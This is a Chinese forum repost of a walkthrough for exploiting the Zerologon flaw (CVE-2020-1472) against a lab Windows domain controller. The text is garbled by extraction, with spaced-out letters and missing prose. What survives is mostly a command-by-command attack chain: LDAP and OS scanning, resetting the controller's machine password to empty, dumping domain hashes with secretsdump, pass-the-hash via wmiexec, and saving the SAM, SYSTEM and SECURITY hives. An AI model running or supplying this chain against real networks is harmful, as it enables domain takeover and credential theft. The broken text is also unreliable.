[27352] 2021-01-20_CVE-2020-1472域内提权利用

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2021-01-20_CVE-2020-1472域内提权利用 C V E - 2 0 2 0 - 1 4 7 2     n e a r s e c   N e a r S e c   2 0 2 1 - 0 1 - 2 0 W i n 2 0 0 8 1 9 2 . 1 6 8 . 1 9 9 . 1 3 1 W i n 7 1 9 2 . 1 6 8 . 1 9 9 . 1 2 8 W i n 0 3 1 9 2 . 1 6 8 . 1 9 9 . 1 2 9 h t t p s : / / g i t h u b . c o m / S e c u r a B V / C V E - 2 0 2 0 - 1 4 7 2 + h t t p s : / / g i t h u b . c o m / r i s k s e n s e / z e r o l o g o n h e x p a s s   h t t p s : / / g i t h u b . c o m / d i r k j a n m / C V E - 2 0 2 0 - 1 4 7 2 h t t p s : / / g i t h u b . c o m / S e c u r e A u t h C o r p / i m p a c k e t 1 2 1 5 3 d n s 3 8 9 l d a p 4 4 5 r d p 2 n b t s t a t   U s a g e n b t s t a t   - A   I P
U s a g e p i n g   . c o m 3 s y s t e m i n f o U s a g e s y s t e m i n f o
4 d n s U s a g e n s l o o k u p 5 U s a g e n e t   c o n f i g   w o r k s t a t i o n
3 c s   l d a p U s a g e L a d o n . e x e   L d a p S c a n E x a m p l e L a d o n . e x e   1 9 2 . 1 6 8 . 1 9 9 . 1 / 2 4   L d a p S c a n I S _ L D A P   1 9 2 . 1 6 8 . 1 9 9 . 1 3 1   3 U s a g e L a d o n . e x e   O s S c a n
E x a m p l e L a d o n . e x e   1 9 2 . 1 6 8 . 1 9 9 . 1 3 1   O s S c a n H K S e r v e r . c o m Y U K O N G H K S e r v e r   Y U K O N G   4 U s a g e p y t h o n 3   z e r o l o g o n _ t e s t e r . p y   E x a m p l e p y t h o n 3   z e r o l o g o n _ t e s t e r . p y   Y U K O N G   1 9 2 . 1 6 8 . 1 9 9 . 1 3 1 5 s e t _ e m p t y _ p w   U s a g e :   s e t _ e m p t y _ p w . p y   < d c - n a m e >   < d c - i p > E x a m p l e p y t h o n 3   s e t _ e m p t y _ p w . p y   Y U K O N G   1 9 2 . 1 6 8 . 1 9 9 . 1 3 1 d u m p   h a s h 6 s e c r e t s d u m p   d u m p   h a s h
U s a g e p y t h o n 3   s e c r e t s d u m p . p y   " / $ " @ - j u s t - d c   - n o - p a s s E x a m p l e p y t h o n 3   s e c r e t s d u m p . p y   " H K S e r v e r / Y U K O N G $ " @ 1 9 2 . 1 6 8 . 1 9 9 . 1 3 1 - j u s t - d c   - n o - p a s s d u m p   Y U K O N G $ 3 1 d 6 c f e . . . . . . - n o - p a s s     d u m p   a d m i n i s t r a t o r   h a s h - j u s t - d c - u s e r   " a d m i n i s t r a t o r "   o k 7 w m i e x e c   h a s h U s a g e p y t h o n 3   w m i e x e c . p y   / a d m i n i s t r a t o r @   - h a s h e s a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 3 7 6 6 c 1 7 d 0 9 6 8 9 c 4 3 8 a 0 7 2 a 3 3 2 7 0 c b 6 f 5 E x a m p l e p y t h o n 3   w m i e x e c . p y   H K S e r v e r / a d m i n i s t r a t o r @ 1 9 2 . 1 6 8 . 1 9 9 . 1 3 1   - h a s h e s a a d 3 b 4 3 5 b 5 1 4 0 4 e e a a d 3 b 4 3 5 b 5 1 4 0 4 e e : 3 7 6 6 c 1 7 d 0 9 6 8 9 c 4 3 8 a 0 7 2 a 3 3 2 7 0 c b 6 f 5
c s r e g   s a v e   H K L M S Y S T E M   s y s t e m . s a v e r e g   s a v e   H K L M S A M   s a m . s a v e r e g   s a v e   H K L M S E C U R I T Y   s e c u r i t y . s a v e g e t   s y s t e m . s a v e g e t   s a m . s a v e g e t   s e c u r i t y . s a v e d e l   / f   s y s t e m . s a v e d e l   / f   s a m . s a v e d e l   / f   s e c u r i t y . s a v e s a v e   w m i e x e c   8 s e c r e t s d u m p   h a s h 退 p y t h o n 3   s e c r e t s d u m p . p y   - s a m   s a m . s a v e   - s y s t e m   s y s t e m . s a v e   - s e c u r i t y s e c u r i t y . s a v e   L O C A L
9 r e i n s t a l l _ o r i g i n a l _ p w   U s a g e p y t h o n 3   r e i n s t a l l _ o r i g i n a l _ p w . p y   h a s h E x a m p l e p y t h o n 3   r e i n s t a l l _ o r i g i n a l _ p w . p y   Y U K O N G   1 9 2 . 1 6 8 . 1 9 9 . 1 3 1 3 0 f 9 0 a 3 b f e 2 f 0 8 5 a 8 8 0 d c f 9 5 4 a 8 8 2 5 f 4 1 0 h a s h   r e s t o r e p a s s w o r d   h e x p a s s 8   p l a n _ p a s s w o r d _ h e x   U s a g e p y t h o n 3   r e s t o r e p a s s w o r d . p y   D C @ D C   - t a r g e t - i p   - h e x p a s s E x a m p l e   p y t h o n 3   r e s t o r e p a s s w o r d . p y   Y U K O N G @ Y U K O N G   - t a r g e t - i p 1 9 2 . 1 6 8 . 1 9 9 . 1 3 1   - h e x p a s s 8 d a c 4 a 0 9 6 e e c 6 6 8 3 9 5 0 7 b 9 0 1 8 a c e 3 e 1 a c 2 e 2 7 e 4 e 8 1 4 5 5 e d a 7 e e 9 e 4 9 d 8 6 a 2 c 5 7 6 1 9 7 4 0 2 0 4 e 7 6 5 7 1 e 5 1 2 1 4 4 a 7 2 c 6 7 d 0 1 e 2 1 a 7 d 6 b 0 c 1 3 e d 4 c e b c 9 7 4 4 2 e 1 f 9 e 7 5 b 6 9 4 3 c 8 f e 4 a 6 7 c 0 c 8 c 6 d f d 0 0 4 6 6 2 4 d d 1 7 4 b 2 d b a 4 6 8 d f 3 3 0 3 a 5 4 a 4 1 b e 3 f 4 1 5 f 1 9 f 7 c f 2 5 a e 6 f 7 3 0 c d a 6 d 1 2 5 e 5 e b f 4 8 0 1 6 1 b 3 b d 9 d 4 d a 2 d c a 2 f 2 1 5 f 0 1 b a 6 b 2 6 6 0 3 b 8 e 3 6 f d 3 b d 8 6 c 3 c b 9 e b b a 1 5 9 d a 7 4 7 d f 8 8 3 1 2 5 e 6 d 0 0 c b e 1 0 5 c 2 7 0 c 8 6 6 d 9 0 4 b 1 6 6 b f 6 3 5 6 f 4 5 5 7 2 d f 5 e d 3 7 9 7 6 5 6 1 d a 2 0 1 e 9 5 4 0 7 4 4 8 4 b 2 d b 4 4 6 2 a e 6 c 3 d 3 5 f c 0 3 5 0 f e a b 0 7 e a 8 8 6 8 9 5 2 f d 8 e 8 4 d 9 d 5 b 6 6 d f 6 5 4 2 e 0 f 4 1 a 1 e 2 8 3 b b 0 9 c 6 c e b f b 2 b b 4 1 f d c 2 b 4 d 0 a 1 e f 8 f 5 b 2 a 9 4 b 2 c 3 7 4 1 c 7 9 f 0 5 c 4 e d c a 1 7 0
1 1 7   3 3 8 9
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则